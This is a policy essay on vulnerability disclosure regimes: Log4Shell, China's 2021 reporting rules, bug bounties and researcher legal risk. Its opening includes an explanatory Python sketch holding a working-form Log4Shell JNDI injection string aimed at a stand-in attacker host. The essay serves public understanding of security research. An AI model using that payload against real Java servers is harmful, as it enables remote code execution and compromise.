At the end of last year, Alibaba security researcher Chen Zhaojun discovered a critical software vulnerability in Log4j, an open-source logging library, and reported it to the Apache Software Foundation. Dubbed Log4Shell, the vulnerability allows an attacker to take control of Java-based web servers through remote-code execution, that is, running arbitrary code on the system from afar. This, coupled with the library’s popularity, made Log4Shell one of the most serious vulnerabilities on the internet in recent years. Although patches have been released, they have not yet been applied across the board, as seen in the run-up to the Russian invasion of Ukraine, when the vulnerability was used to insert malware into government systems.
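In simplified terms, the flaw stems from Log4j expanding special lookup tokens embedded in the strings it logs. The short Python sketch below is an illustration, not Log4j’s actual code: a hypothetical logger that expands `${...}` tokens shows how, once untrusted input reaches a log message, an attacker-supplied `${jndi:...}` token can trigger a lookup the attacker controls.

```python
# Hypothetical sketch of the Log4Shell pattern -- NOT Log4j itself.
# The flaw: a logger that expands "${lookup}" tokens found anywhere
# in the message, including inside untrusted, user-supplied input.
import re

def resolve(token: str) -> str:
    # In Log4j, a "jndi:" token caused a network fetch of
    # attacker-controlled code; here we only simulate the dispatch.
    scheme, _, target = token.partition(":")
    if scheme == "jndi":
        return f"<would fetch and run code from {target}>"
    return token

def log(message: str) -> str:
    # Lookups are expanded even when the token came from user input.
    return re.sub(r"\$\{([^}]*)\}", lambda m: resolve(m.group(1)), message)

# A user-supplied value (e.g. an HTTP User-Agent header) is logged verbatim:
user_input = "${jndi:ldap://attacker.example/x}"
print(log(f"request from {user_input}"))
```

In the real attack, submitting such a string in any field that eventually got logged, such as a chat message or a User-Agent header, was enough, because the vulnerable expansion ran wherever the string was written to a log.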

While Chen’s disclosure process of notifying the vendor first followed well-known industry norms, his actions may have run counter to the intentions of China’s “Regulations on the Management of Network Product Security Vulnerability,” which came into force in September 2021. Under this regulation, companies are required to notify the Ministry of Industry and Information Technology (MIIT) of vulnerabilities found in their own systems within 48 hours, but the requirements for vulnerabilities found elsewhere or by private researchers are less clear. In the Log4Shell case, the MIIT appears to have been notified two weeks later – by whom also remains unclear. Apparently, the MIIT was not pleased and, as a result, sought to suspend its work with Alibaba Cloud as a cyber-threat intelligence partner for half a year.

Some observers in the security community interpreted MIIT’s handling of this case as a warning to other companies and researchers that they should keep the government in the loop from the outset. Others go further, fearing that vulnerabilities might be politicized, or worse, that they will be funneled to state actors for exploitation. Either way, the Log4Shell case is a reminder of the legal uncertainties that security researchers face on a daily basis in many countries, not only China.

We argue that States need to clarify their understanding of responsible disclosure, particularly vis-à-vis the position of China. More generally, we point out that the existing patchwork of regulations in many countries is no longer sustainable, given that it has failed to protect security researchers sufficiently. To develop a better framework, a necessary first step is a deeper understanding of the roles, motivations, practices, and needs of the transnational community of security researchers.

Harnessing the Crowd

At a very fundamental level, communities of security researchers help to close the global cyber-skills gap. In 2025, 3.5 million positions in IT security are predicted to remain vacant, and the number is set to grow in the following years. Coupled with the increasing number of cyberattacks, this shortage directly impacts governments and businesses, limiting their ability to protect themselves. One of the most popular short- to medium-term measures to combat this deficit is the use of Bug Bounty Programs (BBPs).

BBPs offer security researchers, sometimes also dubbed ‘white hat hackers’, a reward or bounty for finding and reporting vulnerabilities in software products. The first program was born in 1995, when Netscape offered money for reporting security bugs in its browser. It took Mozilla nine years to follow the example, and a further three years for the public hacking competition “Pwn2Own” to emerge. Since then, BBPs have gained in importance, launched by businesses, organizations, and governments, and managed mostly via specialized platforms such as HackerOne or Bugcrowd. In many cases, participation is open to all, while other programs impose restrictions, such as invitation-only events in which only those with a proven track record or security clearance can take part. Many HackerOne participants hold regular jobs and hunt bugs in their spare time, and over half are under 25 years of age, using these programs as a training ground for future employment. Aside from leveraging resources that would otherwise not be available, this approach has also proven rather cost-effective for organizations, as the yearly operating costs of a BBP are far below those of hiring additional software engineers, who may never reach the crowd’s efficiency.

Political Pressures and Regulatory Patchworks

Although ethical hackers help to improve cyber defenses through the above-mentioned practices, their activities are often hampered by institutional deficits, legal uncertainties, or even political threats. Around half of HackerOne participants have at least once found a security bug without disclosing it, either due to the absence of reporting channels, the organization’s unresponsiveness, or the lack of a reward. This is especially unfortunate given that specific guidelines on how to set up appropriate vulnerability disclosure management do exist but are rarely implemented. Furthermore, competing regulatory frameworks and legal grey zones can lead to security researchers facing gagging orders, fines, or even imprisonment.

The importance of protecting security researchers was also emphasized at the U.N. level recently, as was the stabilizing role of proper vulnerability disclosure policies. The U.N. Group of Governmental Experts (GGE) and the Open-Ended Working Group (OEWG) underlined governments’ duty to encourage responsible reporting of vulnerabilities in 2021. However, the U.N. norm on responsible vulnerability disclosure does not specify how government entities should handle their own security vulnerabilities, nor does it offer guidelines on how to avoid criminalization of legitimate security research. On top of that, parts of existing cybercrime legislation apply not only to criminal activity but can also be deployed against security researchers, among others. The latter concern was highlighted in a recent letter from Human Rights Watch and numerous other civil society groups addressed to the Chair of the new U.N. Ad Hoc Committee on Cybercrime.

In practice, security researchers are currently faced with a patchwork of often inconsistent or even conflicting norms, institutions, and regulations. In U.S. legislation, for example, Section 1201 of the Digital Millennium Copyright Act (DMCA) prohibits circumventing technological measures to gain unauthorized access to computer software, even for benevolent cybersecurity research. Security companies and organizations have repeatedly raised the issue, advocating for a legislative reform that would allow research in good faith, which contributed to a partial easing of restrictions last year.

An even more pressing example can be found in Section 202c of Germany’s Criminal Code, the so-called “Hacker Paragraph.” Not only does it criminalize the unauthorized acquisition and manipulation of third-party data, but it also includes the preparation thereof. While intended as a protective measure against cybercrime, it also pre-empts and criminalizes security research. Any work on the development, procurement, and distribution of tools for penetration testing can run afoul of this regulation, even though these tools are vital not only for security researchers but also for network administrators and auditors, among others. In a recent case, a German security researcher detected serious flaws within the electoral campaign app of one of the country’s major political parties. Instead of being praised or rewarded for her disclosure, law enforcement agencies opened an investigation into the researcher. The case was eventually closed in September 2021 – but not because of the absence of malicious intent on the part of the researcher; instead, it was closed because the data was not protected from unauthorized access and was therefore, from a technical point of view, publicly retrievable.

Lastly, security researchers can find themselves drawn into larger geopolitical conflicts, negatively affecting global cybersecurity. In the initial weeks following the Russian invasion of Ukraine, some security researchers were blocked from receiving payments for services rendered, as HackerOne seemingly applied a blanket freeze on all users from Belarus, Russia, or Ukraine, citing economic sanctions and export controls without further clarification. More recently, several national governments have reiterated their warnings regarding the Russian-made antivirus software Kaspersky, with Germany’s Federal Office for Information Security (BSI) now following suit. While they did not raise any concrete allegations, their concern stems from the antivirus software requiring extensive system permissions combined with connections to the manufacturer’s servers, at least for updates. The BSI warned that this access could be abused for offensive hacking operations – whether by Kaspersky itself or by outside hackers, including government agents, who exploit Kaspersky’s systems. Some bug bounty platforms, such as HackerOne, kicked Kaspersky off their platforms as a result; Kaspersky has maintained that the warnings are politically motivated.

Opaque Governmental Processes

Another inconsistency concerns the role of civil cybersecurity agencies. On the one hand, they are key actors for sharing vulnerability disclosure best practices and offering anonymized reporting opportunities. Yet their role as a broker and trustworthy intermediary is undermined by a lack of transparency of internal governmental procedures. In many cases, there are insufficient barriers between defensive-oriented civilian cybersecurity agencies and those agencies whose mandates include counteractions or even genuinely offensive cyber operations. One exception is Germany, where a recently revised IT security law prohibits the civil cybersecurity agency from passing vulnerability information to law enforcement, intelligence services, or the military. However, there is still a lack of clarity around the overall handling of vulnerabilities found by German government agencies.

Other governments, notably members of the Five Eyes intelligence-sharing network, have published frameworks for handling vulnerabilities, i.e. for deciding whether to disclose or retain a vulnerability for offensive purposes. The United States published the Vulnerabilities Equities Process (VEP) in 2017 and the U.K., Australia, and Canada followed in subsequent years. These governments have at least established criteria to guide their decisions on the (non-)disclosure of vulnerabilities. Nevertheless, critics have noted that the process itself represents a black box that impedes independent oversight and impact evaluations. Furthermore, purchasing knowledge of vulnerabilities from access brokers has become customary among governmental agencies worldwide. This practice can seriously limit the regulatory effects of VEPs as governmental buyers often need to sign non-disclosure agreements, essentially preventing vulnerabilities from being processed through their VEP or equivalents.

More recently and in the context of the war in Eastern Europe, another worrying practice has emerged: the instrumentalization of bug bounty programs for offensive rather than defensive purposes. In early March, Ukrainian government agencies openly called on hackers to report IT-vulnerabilities within Russian critical infrastructures, not to protect but to attack them. This crowdsourcing of offensive cyber capabilities, although understandable in the midst of such a brutal invasion, nevertheless runs counter to ethical hacking. Decision-makers as well as civil society representatives will need to reflect on the legitimacy of this approach, and the precedent it sets, within the context of the Ukrainian whole-of-nation defense strategy.

The Chinese Push

In sum, vulnerability disclosure regulations in Western countries are not only incoherent and underdeveloped, but arguably also undermined by inconsistent state practices. In contrast, China’s law on vulnerability disclosure (the above-mentioned Regulations on the Management of Network Product Security Vulnerability) is much more comprehensive and guided by principles of nationalization and state control. On the one hand, it encourages the establishment of responsible disclosure practices within the private sector as well as the creation of BBPs. One could even argue that the move to make notification of state authorities mandatory was necessary to ensure that vendors will prioritize the patching of particularly severe vulnerabilities, given that they did not always do so in the past. Yet on the other hand, security researchers face far greater uncertainty. An open question, for instance, is whether future collaboration between white hats and international BBPs will remain legal, as researchers are now precluded from disclosing vulnerabilities to foreign entities that are not vendors. Future implementation and enforcement of the law – as well as new data from BBPs – will show whether this will indeed lead to a massive withdrawal of Chinese researchers. If so, the law would constitute a frontal assault on the open global tradition of security research. As such, it would follow a pattern initiated in 2018, when China prohibited the participation of Chinese researchers in major global hacking competitions.

The law on vulnerability management, coupled with China’s conceptualization of zero-day vulnerabilities as strategic assets even before the new regulation, has also stoked fears that state security and intelligence entities may gain additional resources, or at least information, for offensive purposes. The Chinese government could have offered reassurances by clarifying that civil cybersecurity agencies would not pass vulnerability information to intelligence services or the military, similar to Germany’s approach. Chinese officials have offered neither such reassurances nor any acknowledgment that a global community of security researchers is preferable to its nationalization through the prohibition of transnational collaboration.

As it now stands, the Chinese legislation may violate the spirit of the U.N. cyber norm on responsible disclosure, but certainly not its letter. The fact that there has been no international diplomatic outcry despite the increase in China’s access to zero-day vulnerabilities is a stark reminder of the still rather abstract nature of that norm. This, in turn, puts China – intended or not – in the position of a norm entrepreneur and agenda setter on the international stage, one that is starting to define the terms of acceptable state behavior in this particular area. This might motivate other States to emulate the Chinese example, which in many aspects runs counter to global cybersecurity. If liberal democracies worldwide want to avoid this outcome, they need to come up with their own comprehensive models of vulnerability disclosure policies and promote them at the international level, for example within the U.N. OEWG or via capacity-building programs.

How to Respond to the Challenges

At the very least, any further erosion of the transnational community of security researchers through nationalized regulatory frameworks should be discouraged. Beyond that, further measures must be taken to better protect private security research and to utilize its potential for global cybersecurity.

First, and as indicated by both the U.N. GGE consensus report and the Human Rights Watch letter, there is a need to overcome legal uncertainties and to make sure that responsible disclosure by security researchers is not deterred by excessive criminalization or the threat of high financial penalties. At the U.N. level, this includes a standard on malicious hacking within a new Cybercrime Convention that clearly differentiates it from security researchers’ activities. For state actors, it involves updating outdated laws, setting up responsible disclosure policies, and strengthening the rights of security researchers. One important step could be to mainstream best practices among the private sector, such as the information security standard ISO/IEC 29147:2018, which provides guidelines to vendors on vulnerability disclosure as an extension of the well-known and widely established ISO/IEC 27000-series information security management standards. Companies and administrative bodies should both be incentivized to implement such policies to make vulnerability disclosure processes transparent. The latter could, for instance, be required of critical infrastructure providers or serve as a prerequisite in the context of public procurement policies.

Second, and given recent Chinese agenda-setting, it is imperative for liberal democracies to shape international norms and standards and thus go beyond the recommendations of the OEWG and U.N. GGE reports, defining an explicit framework on what responsible disclosure should look like. These norms should also cover VEPs and similar procedures, ensuring sufficient process transparency, regular evaluations, and oversight by an independent body. Moreover, a key purpose of any such standard-setting activity should be to ensure as much interoperability between governmental regulations as possible, ideally beyond the national or regional contexts. At the same time, liberal democracies need to agree on certain red lines that must be observed in state practice. In particular, there is a need to identify and prevent loopholes, such as the use of commercial third-party vulnerabilities, to circumvent government disclosure practices.

Third, foreign and security policy decision-makers need to engage more actively with security scholars and the wider technical community, especially via timely consultations in the legislative process. Given the impact of new technologies, it could be helpful to set up an international scientific advisory council, similar to the International Society for Stem Cell Research (ISSCR), which enables global collaboration in medical treatment development. In this case, the council should be capable of assessing the implications of new standards and norms as well as the impact of new legislation. This greater engagement, also including the private sector, could substantially support the creation of international capacity-building programs as a peer-learning platform and vehicle of norm diffusion. Lessons could, for example, be drawn from computer incident response teams, which share information and best practices via the Vulnerability Coordination Special Interest Group.

Fourth, international negotiations themselves would benefit from the inclusion of the security community and academia, even beyond the topic of vulnerability disclosure policies. The improvement of export control rules for computer network intrusion software in the Wassenaar Arrangement in 2018 serves as a good example. Whereas the first negotiation was characterized by an oversimplified understanding of computer security practices by the regulating members, a successful revision and correction took place thanks to the direct participation of subject matter experts.

Lastly, and closely related, international negotiations and cooperation in the field of vulnerability disclosure can also take place at the technical level, serving as Track II diplomacy. Workshops and informal meetings, among other exchange formats, can serve as trust-building measures. Security experts, regardless of their provenance, likely share similar views on the issue and can be more open and transparent about concerns, without having to consider the usual diplomatic tug-of-war. This may lead to very different but more practice-oriented solutions at the global level.

Image: A laptop displays a message after being infected by a ransomware as part of a worldwide cyberattack on June 27, 2017 in Geldrop.
The unprecedented global ransomware cyberattack has hit more than 200,000 victims in more than 150 countries (ROB ENGELAAR/AFP/Getty Images)